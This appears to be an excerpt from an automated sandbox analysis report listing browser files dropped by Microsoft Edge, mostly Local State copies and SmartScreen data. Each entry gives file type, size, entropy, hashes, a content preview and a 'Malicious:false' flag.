                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2c22d.TMP (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):56066
                                                                                                                                                                                                                                                                              Entropy (8bit):6.103038538835172
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:z/Ps+wsI7ynCPGWv/sxtwz7VLyMV/YoskFoz:z/0+zI7yn2v/4KfVeZoskG
                                                                                                                                                                                                                                                                              MD5:1493482BF2137752290BC320FB3E4DF5
                                                                                                                                                                                                                                                                              SHA1:1E61B03FD0D1710CC85D7346DEF286C7C0A6441F
                                                                                                                                                                                                                                                                              SHA-256:3C2967E1451BCF9EAA855BB0BB924A7E6E0B21107AE5ED990CCD299AF9A2D733
                                                                                                                                                                                                                                                                              SHA-512:9EECE4AE9E25E3FCD2B0C98F2F99D204412B621AA7DEA027C51F123FFE682B7C4090F0628724682D78EC07720BFB2B3537E138143A079C1F085933C2FC50BCC6
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF37243.TMP (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):56066
                                                                                                                                                                                                                                                                              Entropy (8bit):6.103038538835172
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:z/Ps+wsI7ynCPGWv/sxtwz7VLyMV/YoskFoz:z/0+zI7yn2v/4KfVeZoskG
                                                                                                                                                                                                                                                                              MD5:1493482BF2137752290BC320FB3E4DF5
                                                                                                                                                                                                                                                                              SHA1:1E61B03FD0D1710CC85D7346DEF286C7C0A6441F
                                                                                                                                                                                                                                                                              SHA-256:3C2967E1451BCF9EAA855BB0BB924A7E6E0B21107AE5ED990CCD299AF9A2D733
                                                                                                                                                                                                                                                                              SHA-512:9EECE4AE9E25E3FCD2B0C98F2F99D204412B621AA7DEA027C51F123FFE682B7C4090F0628724682D78EC07720BFB2B3537E138143A079C1F085933C2FC50BCC6
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF39963.TMP (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):56066
                                                                                                                                                                                                                                                                              Entropy (8bit):6.103038538835172
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:z/Ps+wsI7ynCPGWv/sxtwz7VLyMV/YoskFoz:z/0+zI7yn2v/4KfVeZoskG
                                                                                                                                                                                                                                                                              MD5:1493482BF2137752290BC320FB3E4DF5
                                                                                                                                                                                                                                                                              SHA1:1E61B03FD0D1710CC85D7346DEF286C7C0A6441F
                                                                                                                                                                                                                                                                              SHA-256:3C2967E1451BCF9EAA855BB0BB924A7E6E0B21107AE5ED990CCD299AF9A2D733
                                                                                                                                                                                                                                                                              SHA-512:9EECE4AE9E25E3FCD2B0C98F2F99D204412B621AA7DEA027C51F123FFE682B7C4090F0628724682D78EC07720BFB2B3537E138143A079C1F085933C2FC50BCC6
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3cd82.TMP (copy)

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):56066
                                                                                                                                                                                                                                                                              Entropy (8bit):6.103038538835172
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:z/Ps+wsI7ynCPGWv/sxtwz7VLyMV/YoskFoz:z/0+zI7yn2v/4KfVeZoskG
                                                                                                                                                                                                                                                                              MD5:1493482BF2137752290BC320FB3E4DF5
                                                                                                                                                                                                                                                                              SHA1:1E61B03FD0D1710CC85D7346DEF286C7C0A6441F
                                                                                                                                                                                                                                                                              SHA-256:3C2967E1451BCF9EAA855BB0BB924A7E6E0B21107AE5ED990CCD299AF9A2D733
                                                                                                                                                                                                                                                                              SHA-512:9EECE4AE9E25E3FCD2B0C98F2F99D204412B621AA7DEA027C51F123FFE682B7C4090F0628724682D78EC07720BFB2B3537E138143A079C1F085933C2FC50BCC6
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                              Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                              MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                              SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                              SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                              SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):47
                                                                                                                                                                                                                                                                              Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                              MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                              SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                              SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                              SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):35
                                                                                                                                                                                                                                                                              Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                              MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                              SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                              SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                              SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{"forceServiceDetermination":false}

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):81
                                                                                                                                                                                                                                                                              Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                              MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                              SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                              SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                              SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):130439
                                                                                                                                                                                                                                                                              Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                              MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                              SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                              SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                              SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                                                                              Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                              MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                              SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                              SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                              SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\synchronousLookupUris_638343870221005468

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):57
                                                                                                                                                                                                                                                                              Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                              MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                              SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                              SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                              SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):29
                                                                                                                                                                                                                                                                              Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                              SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                              MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                              SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                              SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                              SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:topTraffic_638004170464094982

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):575056
                                                                                                                                                                                                                                                                              Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                              SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                              MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                              SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                              SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                              SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                              Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                              File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                              Size (bytes):460992
                                                                                                                                                                                                                                                                              Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                              SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                              MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                              SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                              SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
